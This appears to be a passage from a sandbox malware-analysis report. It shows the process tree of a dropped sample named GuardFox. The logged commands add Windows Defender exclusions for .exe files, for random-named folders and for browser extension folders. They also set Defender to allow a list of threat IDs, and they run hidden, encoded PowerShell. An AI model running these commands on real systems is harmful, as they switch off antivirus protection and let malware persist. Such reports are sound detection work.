                                                            PID:5024
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                              2⤵
                                                                PID:3032
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                  3⤵
                                                                    PID:2340
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                    3⤵
                                                                      PID:5584
                                                                • C:\Users\Admin\AppData\Local\Temp\is-HBHE5.tmp\BfE8yx2fkiu6S97L10r7DVbH.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-HBHE5.tmp\BfE8yx2fkiu6S97L10r7DVbH.tmp" /SL5="$501D2,3944858,54272,C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe"
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:984
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6136 -ip 6136
                                                                  1⤵
                                                                    PID:1012
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6136 -ip 6136
                                                                    1⤵
                                                                      PID:5164
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa86459758,0x7ffa86459768,0x7ffa86459778
                                                                      1⤵
                                                                        PID:5760
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6136 -ip 6136
                                                                        1⤵
                                                                          PID:5532
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                          1⤵
                                                                            PID:2012
                                                                            • C:\Windows\system32\gpupdate.exe
                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                              2⤵
                                                                                PID:4368
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5292 -ip 5292
                                                                              1⤵
                                                                                PID:788
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6136 -ip 6136
                                                                                1⤵
                                                                                  PID:4484
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2504 -ip 2504
                                                                                  1⤵
                                                                                    PID:2984
                                                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                    1⤵
                                                                                      PID:5284
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6136 -ip 6136
                                                                                      1⤵
                                                                                        PID:5544
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6136 -ip 6136
                                                                                        1⤵
                                                                                          PID:860
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6076 -ip 6076
                                                                                          1⤵
                                                                                            PID:5276
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                            1⤵
                                                                                              PID:3108
                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                              gpscript.exe /RefreshSystemParam
                                                                                              1⤵
                                                                                                PID:5092
                                                                                              • C:\Windows\windefender.exe
                                                                                                C:\Windows\windefender.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1720
                                                                                              • C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\MezcLIfZgZTsssG\BRbsIag.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\MezcLIfZgZTsssG\BRbsIag.exe QS /xnsite_idZua 525403 /S
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in System32 directory
                                                                                                PID:5232
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                  2⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:3368
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:668
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                        4⤵
                                                                                                          PID:1308
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:3876
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:5944
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:1188
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:5956
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:5192
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:5700
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:1352
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:4616
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:5764
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:5184
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:5960
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:3504
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:2564
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:5260
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:2776
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:5536
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:5588
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:2156
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:4604
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:964
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:5432
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:728
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5872
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4572
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2304
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3460
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3684
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARePipIdpjkyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARePipIdpjkyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FWanxCyBMbSwDltdReR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FWanxCyBMbSwDltdReR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JwlnNCQPpOUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JwlnNCQPpOUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MEImWqZTU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MEImWqZTU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TJVxjIvMtcbU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TJVxjIvMtcbU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FMCDzQfSobwHqqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FMCDzQfSobwHqqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LLfSdsPOWigSJrdI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LLfSdsPOWigSJrdI\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                            2⤵
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:3580
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARePipIdpjkyC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5704
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARePipIdpjkyC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1536
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARePipIdpjkyC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5280
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FWanxCyBMbSwDltdReR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1756
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JwlnNCQPpOUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:244
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FWanxCyBMbSwDltdReR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5412
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JwlnNCQPpOUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5324
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MEImWqZTU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5212
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MEImWqZTU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2952
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TJVxjIvMtcbU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5876
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TJVxjIvMtcbU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4012
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FMCDzQfSobwHqqVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5332
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FMCDzQfSobwHqqVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5440
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4020
